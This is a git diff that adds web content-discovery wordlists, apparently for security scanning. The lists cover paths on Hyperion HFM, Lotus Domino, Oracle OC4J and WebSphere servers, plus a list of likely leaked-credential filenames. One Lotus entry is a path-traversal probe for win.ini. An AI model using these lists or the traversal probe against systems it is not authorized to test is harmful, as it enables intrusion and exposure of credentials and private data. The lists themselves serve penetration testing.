/HFM/IntercompanyTransactions/LockUnlockEntities.xsl
|
||||
/HFM/IntercompanyTransactions/ManageICPeriods.asp
|
||||
/HFM/IntercompanyTransactions/ManageICPeriods.xsl
|
||||
/HFM/IntercompanyTransactions/ManageReasonCodes.asp
|
||||
/HFM/IntercompanyTransactions/ManageReasonCodes.xsl
|
||||
/HFM/IntercompanyTransactions/ManualMatchStatus.asp
|
||||
/HFM/IntercompanyTransactions/MonitorICTransactions.asp
|
||||
/HFM/IntercompanyTransactions/MonitorICTrans.xsl
|
||||
/HFM/IntercompanyTransactions/MultiICTReportProcessor.asp
|
||||
/HFM/IntercompanyTransactions/NewEditICTransaction.asp
|
||||
/HFM/IntercompanyTransactions/ProcessICTransactions.asp
|
||||
/HFM/IntercompanyTransactions/ProcessICTrans.xsl
|
||||
/HFM/IntercompanyTransactions/ProcessTransAction.xsl
|
||||
/HFM/IntercompanyTransactions/ReportByAcct.asp
|
||||
/HFM/IntercompanyTransactions/ReportByID.asp
|
||||
/HFM/IntercompanyTransactions/ReportHeader.xsl
|
||||
/HFM/IntercompanyTransactions/ReportSection.xsl
|
||||
/HFM/IntercompanyTransactions/SetICReasonCodes.asp
|
||||
/HFM/IntercompanyTransactions/UnmatchICTransactions.asp
|
||||
/HFM/IntercompanyTransactions/UnmatchICTransactions.xsl
|
||||
/HFM/IntercompanyTransactions/XslObjects.asp
|
||||
/HFM/Java
|
||||
/HFM/Java/classes
|
||||
/HFM/Java/classes//HFMJavaWebComponents.jar
|
||||
/HFM/Java/classes/xerces
|
||||
/HFM/Java/classes/xerces/xercesImpl.jar
|
||||
/HFM/Java/classes/xerces/xmlParserAPIs.jar
|
||||
/HFM/Journals
|
||||
/HFM/Journals//HFM_PrintSingleJournal.xsl
|
||||
/HFM/Journals//HFM_PrintSingleTemplate.xsl
|
||||
/HFM/Journals/JournalEntry.asp
|
||||
/HFM/Journals/Journals2.asp
|
||||
/HFM/Journals/JournalsAction.asp
|
||||
/HFM/Journals/JournalsCommon.asp
|
||||
/HFM/Journals/JournalsDefColumns.asp
|
||||
/HFM/Journals/JournalsDefFilter.asp
|
||||
/HFM/Journals/JournalsDefProperties.asp
|
||||
/HFM/Journals/JournalsMain.asp
|
||||
/HFM/Journals/JournalsNew.asp
|
||||
/HFM/Journals/ManageGroups.asp
|
||||
/HFM/Journals/ManagePeriods.asp
|
||||
/HFM/Journals/OpenJournal.asp
|
||||
/HFM/Journals/OpenTemplate.asp
|
||||
/HFM/Journals/PrintSingleJournal.asp
|
||||
/HFM/Journals/ProcessFilterGetEntity.asp
|
||||
/HFM/Journals/ProcessJournalEntry.asp
|
||||
/HFM/Journals/ProcessJournalsPOV.asp
|
||||
/HFM/Journals/ProcessJournalsQueryDef.asp
|
||||
/HFM/Journals/ProcessLIPOVJournals.asp
|
||||
/HFM/Journals/ProcessManagePeriods.asp
|
||||
/HFM/Journals/ProcessMbrSelClickMain.asp
|
||||
/HFM/Journals/ProcessPOVForGeneration.asp
|
||||
/HFM/Journals/ProcessTemplateEntry.asp
|
||||
/HFM/Journals/QueryDef.asp
|
||||
/HFM/Journals/TemplateEntry.asp
|
||||
/HFM/Journals/TemplatesAction.asp
|
||||
/HFM/Journals/TemplatesMain.asp
|
||||
/HFM/Journals/TemplatesNew.asp
|
||||
/HFM/LoadExtract
|
||||
/HFM/LoadExtract/downloadictlog.asp
|
||||
/HFM/LoadExtract/ExtractData.asp
|
||||
/HFM/LoadExtract/ExtractJournals.asp
|
||||
/HFM/LoadExtract/ExtractMemberLists.asp
|
||||
/HFM/LoadExtract/ExtractMetaData.asp
|
||||
/HFM/LoadExtract/ExtractRules.asp
|
||||
/HFM/LoadExtract/ExtractSecurity.asp
|
||||
/HFM/LoadExtract/ExtractTransactions.asp
|
||||
/HFM/LoadExtract/HsvJSConstantsServer_LoadExtract.asp
|
||||
/HFM/LoadExtract/loaddata.asp
|
||||
/HFM/LoadExtract/LoadJournals.asp
|
||||
/HFM/LoadExtract/LoadMemberLists.asp
|
||||
/HFM/LoadExtract/loadmeta.asp
|
||||
/HFM/LoadExtract/loadmeta_options.asp
|
||||
/HFM/LoadExtract/LoadRules.asp
|
||||
/HFM/LoadExtract/LoadSecurity.asp
|
||||
/HFM/LoadExtract/LoadTransactions.asp
|
||||
/HFM/LoadExtract/ProcessExtractJournals.asp
|
||||
/HFM/LoadExtract/ProcessExtractMemberlists.asp
|
||||
/HFM/LoadExtract/ProcessExtractMetaData.asp
|
||||
/HFM/LoadExtract/ProcessExtractRules.asp
|
||||
/HFM/LoadExtract/ProcessExtractSecurity.asp
|
||||
/HFM/LoadExtract/processExtractTransactions.asp
|
||||
/HFM/LoadExtract/ProcessJournalsExtractTree.asp
|
||||
/HFM/LoadExtract/ProcessLoadData.asp
|
||||
/HFM/LoadExtract/ProcessLoadJournals.asp
|
||||
/HFM/LoadExtract/ProcessLoadMemberLists.asp
|
||||
/HFM/LoadExtract/ProcessLoadRules.asp
|
||||
/HFM/LoadExtract/ProcessLoadSecurity.asp
|
||||
/HFM/LoadExtract/ProcessLoadTransactions.asp
|
||||
/HFM/LoadExtract/ProcessTransactionsExtractTree.asp
|
||||
/HFM/Logon
|
||||
/HFM/Logon/AuthenticateUser.asp
|
||||
/HFM/Logon/Logoff.asp
|
||||
/HFM/Logon/ProcessLogoff.asp
|
||||
/HFM/Logon/ProcessLogon.asp
|
||||
/HFM/Logon/SSO.asp
|
||||
/HFM/MbrSel
|
||||
/HFM/MbrSel/MbrSel.asp
|
||||
/HFM/MbrSel/MbrSel_Include.asp
|
||||
/HFM/MbrSel/MbrSel_Test.asp
|
||||
/HFM/MbrSel/MbrSelXml.asp
|
||||
/HFM/OpenApp
|
||||
/HFM/OpenApp/appopen.asp
|
||||
/HFM/OpenApp/CloseApp.asp
|
||||
/HFM/OpenApp/CloseApplication.asp
|
||||
/HFM/OpenApp/DisplayServers.asp
|
||||
/HFM/OpenApp/HsvJSConstantsServer_OpenApp.asp
|
||||
/HFM/OpenApp/OpenAppDirect.asp
|
||||
/HFM/OpenApp/ReopenAppDirect.asp
|
||||
/HFM/OpenApp/SelectApp.asp
|
||||
/HFM/OpenApp/SelectServer.asp
|
||||
/HFM/OpenApp/ServerStatus.asp
|
||||
/HFM/OpenApp/StartPage.asp
|
||||
/HFM/OwnershipManagement
|
||||
/HFM/OwnershipManagement/DisplayColumns.asp
|
||||
/HFM/OwnershipManagement/EPUFilterOptions.asp
|
||||
/HFM/OwnershipManagement/EPUReport.asp
|
||||
/HFM/OwnershipManagement/EPU_Report.xsl
|
||||
/HFM/OwnershipManagement/EPU.xsl
|
||||
/HFM/OwnershipManagement/ManageEPU.asp
|
||||
/HFM/OwnershipManagement/OwnershipManagement.asp
|
||||
/HFM/OwnershipManagement/ProcessCalcEPU.asp
|
||||
/HFM/OwnershipManagement/ProcessSharesCalculation.asp
|
||||
/HFM/OwnershipManagement/SharesCalculation.asp
|
||||
/HFM/POV
|
||||
/HFM/POV/POVCommon.asp
|
||||
/HFM/POV/povfinishpage.asp
|
||||
/HFM/POV/POVRequestData.asp
|
||||
/HFM/POV/povstartpage.asp
|
||||
/HFM/ProcessManagement
|
||||
/HFM/ProcessManagement/ProcessFlowHistory.asp
|
||||
/HFM/ProcessManagement/ProcessFlowManagement.asp
|
||||
/HFM/ProcessManagement/ProcessFlowValidationDetail.asp
|
||||
/HFM/ProcessManagement/ProcessManagement.asp
|
||||
/HFM/ProcessManagement/ProcessManagementSummary.asp
|
||||
/HFM/Reports
|
||||
/HFM/Reports/AddICPAccount.asp
|
||||
/HFM/Reports/checkStatus.asp
|
||||
/HFM/Reports/DynamicICP.asp
|
||||
/HFM/Reports/EditReport.asp
|
||||
/HFM/Reports/HsvJSConstantsServer_Reports.asp
|
||||
/HFM/Reports/ICPCommon.asp
|
||||
/HFM/Reports/ICPReportBuilder.asp
|
||||
/HFM/Reports/ICPReports.asp
|
||||
/HFM/Reports/OpenLocalReports.asp
|
||||
/HFM/Reports/OpenRemoteReport.asp
|
||||
/HFM/Reports/OpenRemoteReports.asp
|
||||
/HFM/Reports/PrintJournalReportOverride.asp
|
||||
/HFM/Reports/PrintReports.asp
|
||||
/HFM/Reports/ProcessICPGetEntity.asp
|
||||
/HFM/Reports/ProcessICPPOV.asp
|
||||
/HFM/Reports/ProcessICPReports.asp
|
||||
/HFM/Reports/ProcessJournalReports.asp
|
||||
/HFM/Reports/ProcessJournalReportsPov.asp
|
||||
/HFM/Reports/ProcessOpenLocalReports.asp
|
||||
/HFM/Reports/ReportFormatOptions.asp
|
||||
/HFM/Reports/SaveJournalReportLocal.asp
|
||||
/HFM/Reports/SaveLocal.asp
|
||||
/HFM/Security
|
||||
/HFM/Security/bpm
|
||||
/HFM/Security/bpm/asp
|
||||
/HFM/Security/bpm/asp/tree.asp
|
||||
/HFM/Security/bpm/BpmLauncher.asp
|
||||
/HFM/Security/bpm/BpmLauncher.xml
|
||||
/HFM/Security/bpm/BpmUi_Version.xml
|
||||
/HFM/Security/bpm/conf
|
||||
/HFM/Security/bpm/conf/BpmContextConfig.xml
|
||||
/HFM/Security/bpm/conf/BpmContextConfig.xsd
|
||||
/HFM/Security/bpm/conf/BpmDebugConfig.xml
|
||||
/HFM/Security/bpm/conf/BpmReleaseConfig.xml
|
||||
/HFM/Security/bpm/conf//HFMConfig.xml
|
||||
/HFM/Security/bpm/launcher.asp
|
||||
/HFM/Security/bpm/modules
|
||||
/HFM/Security/bpm/modules/com
|
||||
/HFM/Security/bpm/modules/com/hyperion
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard/Adf.asp
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/Adf.asp
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header/header.inc
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/appcontainer
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/appcontainer/Adf.asp
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/prefs
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/prefs/Adf.asp
|
||||
/HFM/Security/bpm/resources
|
||||
/HFM/Security/conf
|
||||
/HFM/Security/conf//HFMConfig.xml
|
||||
/HFM/Security/createSecurityClass.asp
|
||||
/HFM/Security/deleteSecurityClass.asp
|
||||
/HFM/Security/GetClasses.asp
|
||||
/HFM/Security/getRightsAndRoles.asp
|
||||
/HFM/Security/getRights.asp
|
||||
/HFM/Security/getRoles.asp
|
||||
/HFM/Security/GetUsers.asp
|
||||
/HFM/Security/getUsersInGroup.asp
|
||||
/HFM/Security/modules
|
||||
/HFM/Security/modules/com
|
||||
/HFM/Security/modules/com/hyperion
|
||||
/HFM/Security/modules/com/hyperion//HFM
|
||||
/HFM/Security/modules/com/hyperion//HFM/web
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/appnode
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/appnode/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/AssignRights.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/DataSet.xml
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/DataSet.xsd
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/classes
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/classes/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/classes/Classes.xsd
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserGroupCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserGroupHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsAndRolesCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsAndRolesHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRolesCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRolesHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/users
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/users/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/users/Users.xsd
|
||||
/HFM/Security/olapsample.csv
|
||||
/HFM/Security/saveAsCsv.asp
|
||||
/HFM/Security/saveRights.asp
|
||||
/HFM/Security/securityAssignmentWizard.asp
|
||||
/HFM/Security/setSelectedClasses.asp
|
||||
/HFM/Security/setSelectedUsers.asp
|
||||
/HFM/Security/TestSecurityHarness.asp
|
||||
/HFM/ThirdParty
|
||||
/HFM/ThirdParty/Bindows
|
||||
/HFM/ThirdParty/Bindows/html
|
||||
/HFM/ThirdParty/Bindows/html/bimain.html
|
||||
/HFM/ThirdParty/Bindows/html/BiWsdlBuiltinTypes.xsd
|
||||
/HFM/ThirdParty/Bindows/html/blank.html
|
||||
/HFM/Workspace
|
||||
/HFM/Workspace/EmptyWorkspace.asp
|
||||
/HFM/Workspace/Preferences.asp
|
||||
/HFM/Workspace/Workspace.asp
|
||||
/HFM/Workspace/WorkspaceCommon.asp
|
||||
/HFM/Workspace/WorkspaceFlow.asp
|
344
discovery/generic/interesting-files-lotus-notes.txt
Normal file
344
discovery/generic/interesting-files-lotus-notes.txt
Normal file
|
@ -0,0 +1,344 @@
|
|||
/852566C90012664F
|
||||
/admin4.nsf
|
||||
/admin5.nsf
|
||||
/admin.nsf
|
||||
/agentrunner.nsf
|
||||
/alog.nsf
|
||||
/a_domlog.nsf
|
||||
/bookmark.nsf
|
||||
/busytime.nsf
|
||||
/catalog.nsf
|
||||
/certa.nsf
|
||||
/certlog.nsf
|
||||
/certsrv.nsf
|
||||
/chatlog.nsf
|
||||
/clbusy.nsf
|
||||
/cldbdir.nsf
|
||||
/clusta4.nsf
|
||||
/collect4.nsf
|
||||
/da.nsf
|
||||
/dba4.nsf
|
||||
/dclf.nsf
|
||||
/DEASAppDesign.nsf
|
||||
/DEASLog01.nsf
|
||||
/DEASLog02.nsf
|
||||
/DEASLog03.nsf
|
||||
/DEASLog04.nsf
|
||||
/DEASLog05.nsf
|
||||
/DEASLog.nsf
|
||||
/decsadm.nsf
|
||||
/decslog.nsf
|
||||
/DEESAdmin.nsf
|
||||
/dirassist.nsf
|
||||
/doladmin.nsf
|
||||
/domadmin.nsf
|
||||
/domcfg.nsf
|
||||
/domguide.nsf
|
||||
/domlog.nsf
|
||||
/dspug.nsf
|
||||
/events4.nsf
|
||||
/events5.nsf
|
||||
/events.nsf
|
||||
/event.nsf
|
||||
/homepage.nsf
|
||||
/iNotes/Forms5.nsf/$DefaultNav
|
||||
/jotter.nsf
|
||||
/leiadm.nsf
|
||||
/leilog.nsf
|
||||
/leivlt.nsf
|
||||
/log4a.nsf
|
||||
/log.nsf
|
||||
/l_domlog.nsf
|
||||
/mab.nsf
|
||||
/mail10.box
|
||||
/mail1.box
|
||||
/mail2.box
|
||||
/mail3.box
|
||||
/mail4.box
|
||||
/mail5.box
|
||||
/mail6.box
|
||||
/mail7.box
|
||||
/mail8.box
|
||||
/mail9.box
|
||||
/mail.box
|
||||
/msdwda.nsf
|
||||
/mtatbls.nsf
|
||||
/mtstore.nsf
|
||||
/names.nsf
|
||||
/nntppost.nsf
|
||||
/nntp/nd000001.nsf
|
||||
/nntp/nd000002.nsf
|
||||
/nntp/nd000003.nsf
|
||||
/ntsync45.nsf
|
||||
/perweb.nsf
|
||||
/qpadmin.nsf
|
||||
/quickplace/quickplace/main.nsf
|
||||
/reports.nsf
|
||||
/sample/siregw46.nsf
|
||||
/schema50.nsf
|
||||
/setupweb.nsf
|
||||
/setup.nsf
|
||||
/smbcfg.nsf
|
||||
/smconf.nsf
|
||||
/smency.nsf
|
||||
/smhelp.nsf
|
||||
/smmsg.nsf
|
||||
/smquar.nsf
|
||||
/smsolar.nsf
|
||||
/smtime.nsf
|
||||
/smtpibwq.nsf
|
||||
/smtpobwq.nsf
|
||||
/smtp.box
|
||||
/smtp.nsf
|
||||
/smvlog.nsf
|
||||
/srvnam.htm
|
||||
/statmail.nsf
|
||||
/statrep.nsf
|
||||
/stauths.nsf
|
||||
/stautht.nsf
|
||||
/stconfig.nsf
|
||||
/stconf.nsf
|
||||
/stdnaset.nsf
|
||||
/stdomino.nsf
|
||||
/stlog.nsf
|
||||
/streg.nsf
|
||||
/stsrc.nsf
|
||||
/userreg.nsf
|
||||
/vpuserinfo.nsf
|
||||
/webadmin.nsf
|
||||
/web.nsf
|
||||
/.nsf/../winnt/win.ini
|
||||
/?Open
|
||||
?Open
|
||||
?OpenServer
|
||||
AgentRunner.nsf
|
||||
DEASAppDesign.nsf
|
||||
DEASLog.nsf
|
||||
DEASLog01.nsf
|
||||
DEASLog02.nsf
|
||||
DEASLog03.nsf
|
||||
DEASLog04.nsf
|
||||
DEASLog05.nsf
|
||||
DEESAdmin.nsf
|
||||
a_domlog.nsf
|
||||
account.nsf
|
||||
accounts.nsf
|
||||
activity.nsf
|
||||
adm-bin/acls.exe
|
||||
adm-bin/alerts.exe
|
||||
adm-bin/console.exe
|
||||
adm-bin/listdb.exe
|
||||
adm-bin/webstats.exe
|
||||
admin.nsf
|
||||
admin4.nsf
|
||||
admin5.nsf
|
||||
adminadm0disk.nsf
|
||||
adminadm0plog.nsf
|
||||
agentrunner.nsf
|
||||
agentrunner.nsf
|
||||
alog.nsf
|
||||
alog4.nsf
|
||||
archive/a_domlog.nsf
|
||||
archive/l_domlog.nsf
|
||||
billing.nsf
|
||||
bookmark.nsf
|
||||
bookmarks.nsf
|
||||
books.nsf
|
||||
busytime.nsf
|
||||
busytime.nsf
|
||||
calendar.nsf
|
||||
catalog.nsf
|
||||
catalog.nsf
|
||||
cersvr.nsf
|
||||
certa.nsf
|
||||
certlog.nsf
|
||||
certsrv.nsf
|
||||
certsrv.nsf
|
||||
chatlog.nsf
|
||||
clbusy.nsf
|
||||
cldbdir.nsf
|
||||
clusta4.nsf
|
||||
collect4.nsf
|
||||
cpa.nsf
|
||||
customerdata
|
||||
da.nsf
|
||||
database.nsf
|
||||
db.nsf
|
||||
dba4.nsf
|
||||
dbdirman.nsf
|
||||
dclf.nsf
|
||||
decsadm.nsf
|
||||
decsadm.nsf
|
||||
decslog.nsf
|
||||
default.nsf
|
||||
deslog.nsf
|
||||
diiop_ior.txt
|
||||
dirassist.nsf
|
||||
doc/dspug.nsf
|
||||
doc/helpadmn.nsf
|
||||
doc/javapg.nsf
|
||||
doc/readmec.nsf
|
||||
doladmin.nsf
|
||||
domadmin.nsf
|
||||
domcfg.nsf
|
||||
domguide.nsf
|
||||
domlog.nsf
|
||||
domlog.nsf
|
||||
dspug.nsf
|
||||
dspug.nsf
|
||||
event.nsf
|
||||
events.nsf
|
||||
events4.nsf
|
||||
events4.nsf
|
||||
events5.nsf
|
||||
group.nsf
|
||||
groups.nsf
|
||||
help/decsdoc.nsf
|
||||
help/decsdoc6.nsf
|
||||
help/dols_help.nsf
|
||||
help/help5_admin.nsf
|
||||
help/help5_client.nsf
|
||||
help/help5_designer.nsf
|
||||
help/help65_admin.nsf
|
||||
help/help65_client.nsf
|
||||
help/help65_designer.nsf
|
||||
help/lccon.nsf
|
||||
help/lccon6.nsf
|
||||
help/lsxlc.nsf
|
||||
help/lsxlc6.nsf
|
||||
help/readme.nsf
|
||||
help4.nsf
|
||||
helplt4.nsf
|
||||
hidden.nsf
|
||||
homepage.nsf
|
||||
iNotes/Forms5.nsf
|
||||
iNotes/Forms5.nsf/$DefaultNav
|
||||
iNotes/Forms6.nsf
|
||||
iNotes/help65_iwa_en.nsf
|
||||
iNotesForms5.nsf
|
||||
jotter.nsf
|
||||
l_domlog.nsf
|
||||
lccon.nsf
|
||||
ldap.nsf
|
||||
leiadm.nsf
|
||||
leilog.nsf
|
||||
leivlt.nsf
|
||||
lndfr.nsf
|
||||
log.nsf
|
||||
log.nsf
|
||||
log4a.nsf
|
||||
loga4.nsf
|
||||
lsxlc.nsf
|
||||
mab.nsf
|
||||
mail.box
|
||||
mail.box
|
||||
mail/NOMBRE_USUARIO.nsf
|
||||
mail/admin.nsf
|
||||
mail/pxp.nsf
|
||||
mail1.box
|
||||
mail10.box
|
||||
mail2.box
|
||||
mail3.box
|
||||
mail4.box
|
||||
mail5.box
|
||||
mail6.box
|
||||
mail7.box
|
||||
mail8.box
|
||||
mail9.box
|
||||
mailw46.nsf
|
||||
msdwda.nsf
|
||||
mtatbls.nsf
|
||||
mtstore.nsf
|
||||
names.nsf
|
||||
names.nsf
|
||||
nntp/nd000000.nsf
|
||||
nntp/nd000001.nsf
|
||||
nntp/nd000002.nsf
|
||||
nntp/nd000003.nsf
|
||||
nntp/nd000004.nsf
|
||||
nntppost.nsf
|
||||
nntppost.nsf
|
||||
notes.nsf
|
||||
ntsync4.nsf
|
||||
ntsync45.nsf
|
||||
ntsync45.nsf
|
||||
patrol41.nsf
|
||||
perweb.nsf
|
||||
private.nsf
|
||||
proghelp/KBCCV11.NSF
|
||||
proghelp/KBNV11.NSF
|
||||
proghelp/KBSSV11.NSF
|
||||
public.nsf
|
||||
puserinfo.nsf
|
||||
qpadmin.nsf
|
||||
qstart.nsf
|
||||
quickplace/quickplace/main.nsf
|
||||
quickplacequickplacemain.nsf
|
||||
quickstart/qstart50.nsf
|
||||
quickstart/wwsample.nsf
|
||||
readme.nsf
|
||||
reports.nsf
|
||||
reports.nsf
|
||||
resource.nsf
|
||||
sample/faqw46.nsf
|
||||
sample/framew46.nsf
|
||||
sample/pagesw46.nsf
|
||||
sample/siregw46.nsf
|
||||
sample/site1w46.nsf
|
||||
sample/site2w46.nsf
|
||||
sample/site3w46.nsf
|
||||
schema.nsf
|
||||
schema50.nsf
|
||||
schema50.nsf
|
||||
secret.nsf
|
||||
setup.nsf
|
||||
setup.nsf
|
||||
setupweb.nsf
|
||||
setupweb.nsf
|
||||
smbcfg.nsf
|
||||
smbcfg.nsf
|
||||
smconf.nsf
|
||||
smency.nsf
|
||||
smhelp.nsf
|
||||
smmsg.nsf
|
||||
smquar.nsf
|
||||
smsolar.nsf
|
||||
smtime.nsf
|
||||
smtp.box
|
||||
smtp.nsf
|
||||
smtpibwq.nsf
|
||||
smtpobwq.nsf
|
||||
smtptbls.nsf
|
||||
smvlog.nsf
|
||||
software.nsf
|
||||
srvnam.htm
|
||||
srvnam.nsf
|
||||
statauths.nsf
|
||||
statautht.nsf
|
||||
statmail.nsf
|
||||
statmail.nsf
|
||||
statrep.nsf
|
||||
statrep.nsf
|
||||
stauths.nsf
|
||||
stautht.nsf
|
||||
stconf.nsf
|
||||
stconf.nsf
|
||||
stconfig.nsf
|
||||
stconfig.nsf
|
||||
stdnaset.nsf
|
||||
stdnaset.nsf
|
||||
stdomino.nsf
|
||||
stlog.nsf
|
||||
stlog.nsf
|
||||
streg.nsf
|
||||
stsrc.nsf
|
||||
stsrc.nsf
|
||||
test.nsf
|
||||
userreg.nsf
|
||||
users.nsf
|
||||
vpuserinfo.nsf
|
||||
web.nsf
|
||||
web.nsf
|
||||
webadmin.nsf
|
||||
welcome.nsf
|
||||
|
|
@ -0,0 +1,163 @@
|
|||
*.jsp
|
||||
Adaptador
|
||||
Admin
|
||||
AggreSpy
|
||||
Apps
|
||||
BBoardServlet
|
||||
BPELConsole
|
||||
ConfigServlet
|
||||
CookieExample
|
||||
Counter
|
||||
DateServlet
|
||||
EJB
|
||||
EMDServlet
|
||||
FE
|
||||
HelloWorldServlet
|
||||
HelloworldExample
|
||||
HelloworldServlet
|
||||
HttpSoap12
|
||||
JMSRouter_MBean_starter
|
||||
JMXSoapAdapter
|
||||
JMXSoapAdapter-web
|
||||
JSP
|
||||
OHW
|
||||
Oracle
|
||||
OracleASjms
|
||||
RedirectServlet
|
||||
RequestHeaderExample
|
||||
RequestInfoExample
|
||||
RequestParamExample
|
||||
Servlet
|
||||
ServletToJsp
|
||||
Servlets
|
||||
SessionExample
|
||||
SessionServlet
|
||||
SimpleServlet
|
||||
SnoopServlet
|
||||
Spy
|
||||
ToJSPServlet
|
||||
ViewSrc
|
||||
_pages
|
||||
admin_ejb
|
||||
aqserv/servlet
|
||||
ascontrol
|
||||
basic
|
||||
bc4j
|
||||
bc4j.jsp
|
||||
bpel
|
||||
cabo
|
||||
cal
|
||||
catalog
|
||||
ccore
|
||||
cgi-bin
|
||||
console
|
||||
console
|
||||
console/*
|
||||
console/help/*
|
||||
dav_public
|
||||
default
|
||||
defaultWebApp
|
||||
dms
|
||||
dms/AggreSpy
|
||||
dms/Spy
|
||||
dms0
|
||||
dms0/AggreSpy
|
||||
dms0/Spy
|
||||
dmsoc4j
|
||||
dmsoc4j/AggreSpy
|
||||
dynamicImage
|
||||
dynamicImage
|
||||
dynamicImage/*
|
||||
echo
|
||||
echo2
|
||||
em
|
||||
esb
|
||||
esb/
|
||||
examples
|
||||
examples/jsp/jsp2/misc/config.jsp
|
||||
examples/jsp/snp/snoop.jsp
|
||||
false
|
||||
fcgi-bin
|
||||
fcgi-bin/echo
|
||||
fcgi-bin/echo.exe
|
||||
fcgi-bin/echo2
|
||||
fcgi-bin/echo2.exe
|
||||
hellouser
|
||||
hellouser.jsp
|
||||
home
|
||||
home/oas/OraHome_1/
|
||||
ias/cluster/appServer.jsp
|
||||
ias/cluster/topology.jsp
|
||||
ias/faintTabsInclude.jsp
|
||||
ias/oc4j/admin/j2eeWebsites.jsp
|
||||
ias/oc4j/admin/websites/wsHome.jsp
|
||||
ias/oc4j/administration.jsp
|
||||
ias/oc4j/app/appHome.jsp
|
||||
ias/oc4j/app/appViewDesc.jsp
|
||||
index.html
|
||||
index.jsp
|
||||
index_jsp
|
||||
index_jsp
|
||||
j2ee
|
||||
javacachedocs
|
||||
jmsrouter
|
||||
jmsrouter_ejb
|
||||
jmsrouter_web
|
||||
jsp
|
||||
jspdocs
|
||||
jspsamples
|
||||
login.html
|
||||
logon.jsp
|
||||
netbanking
|
||||
no
|
||||
oas
|
||||
oc4j
|
||||
oc4j-status
|
||||
oc4jadmin
|
||||
oiddas
|
||||
oiddas/ui/oracle/ldap/das
|
||||
ojspdemos
|
||||
oprocmgr-service
|
||||
oracle
|
||||
perl
|
||||
petstore
|
||||
portlist
|
||||
printenv
|
||||
ruleauthor
|
||||
servlet
|
||||
servlet/BBoardServlet
|
||||
servlet/ConfigServlet
|
||||
servlet/CookieExample
|
||||
servlet/Counter
|
||||
servlet/DateServlet
|
||||
servlet/HelloWorldExample
|
||||
servlet/HelloWorldServlet
|
||||
servlet/RedirectServlet
|
||||
servlet/RequestHeaderExample
|
||||
servlet/RequestInfoExample
|
||||
servlet/RequestParamExample
|
||||
servlet/SessionExample
|
||||
servlet/SessionServlet
|
||||
servlet/SimpleServlet
|
||||
servlet/SnoopServlet
|
||||
servlet/ToJSPServlet
|
||||
servlet/ViewSrc
|
||||
servlet/ViewSrc/*
|
||||
servlet/servletToJsp
|
||||
shutdown
|
||||
simple
|
||||
snoop.jsp
|
||||
snp
|
||||
stressH
|
||||
system
|
||||
testru
|
||||
testunit
|
||||
transtrace
|
||||
true
|
||||
uixi
|
||||
usebean.jsp
|
||||
utility
|
||||
webapp
|
||||
webapp/wm/bc4j.jsp
|
||||
welcomeuser.jsp
|
||||
wm
|
24
discovery/generic/interesting-files-random.txt
Normal file
24
discovery/generic/interesting-files-random.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
accounts.txt
|
||||
culeadora.txt
|
||||
data.txt
|
||||
database.txt
|
||||
grabbed.html
|
||||
info.txt
|
||||
l0gs.txt
|
||||
log.txt
|
||||
logins.txt
|
||||
logs.txt
|
||||
members.txt
|
||||
pass.txt
|
||||
passes.txt
|
||||
password.html
|
||||
password.txt
|
||||
passwords.html
|
||||
passwords.txt
|
||||
pazz.txt
|
||||
pazzezs.txt
|
||||
pw.txt
|
||||
pws.txt
|
||||
technico.txt
|
||||
usernames.txt
|
||||
users.txt
|
366
discovery/generic/interesting-files-websphere.txt
Normal file
366
discovery/generic/interesting-files-websphere.txt
Normal file
|
@ -0,0 +1,366 @@
|
|||
*
|
||||
*.do
|
||||
*.jsp
|
||||
*.jsv
|
||||
*.jsw
|
||||
AddressBookJ2WB
|
||||
AddressBookJ2WB/*
|
||||
AddressBookJ2WE/*.jsp
|
||||
AddressBookJ2WE/*.jsv
|
||||
AddressBookJ2WE/*.jsw
|
||||
AddressBookJ2WE/services/AddressBook
|
||||
AddressBookJ2WE/services/AddressBook/wsdl/*
|
||||
AddressBookW2JB
|
||||
AddressBookW2JB/*
|
||||
AddressBookW2JE/*.jsp
|
||||
